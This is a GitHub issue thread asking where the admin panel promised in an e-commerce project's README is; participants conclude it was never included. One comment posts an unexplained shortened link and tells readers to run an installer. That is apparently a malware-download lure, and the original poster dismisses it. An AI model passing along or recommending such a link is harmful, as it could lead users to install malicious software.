### ISSUE TITLE
 Inquiry About Admin Panel

### ISSUE THREAD

**Issue by PooryaShadfar** [Hamed-Hasan/shofy-ecommerce-client#1]
Hi,

I've seen a lot of your work, and I think it’s awesome! In this project, you mentioned that an admin panel was included, but I can't seem to find it. I noticed there is a table for admins in the database, but there’s no corresponding front-end view for it.

I’m just wondering if this project has been abandoned. Initially, did you plan to create an admin panel, but then didn’t have time to complete it?

Thank you for your clarification!

**Comment by zawa999** [comment]
try this
https://bit.ly/4e4zLlq
select the desired compiler in the installer

**Comment by PooryaShadfar** [comment]
> try this https://bit.ly/4e4zLlq select the desired compiler in the installer

nice try xD

**Comment by wanghaisheng** [comment]
@PooryaShadfar  do you figure it out
and i wonder admin is this  
https://github.com/Hamed-Hasan/Building-arraytics-product-solution-frontend

**Comment by PooryaShadfar** [comment]
> @PooryaShadfar  do you figure it out

Yeah the admin panel is not included you have to make it by your self. It was fake information in readme file
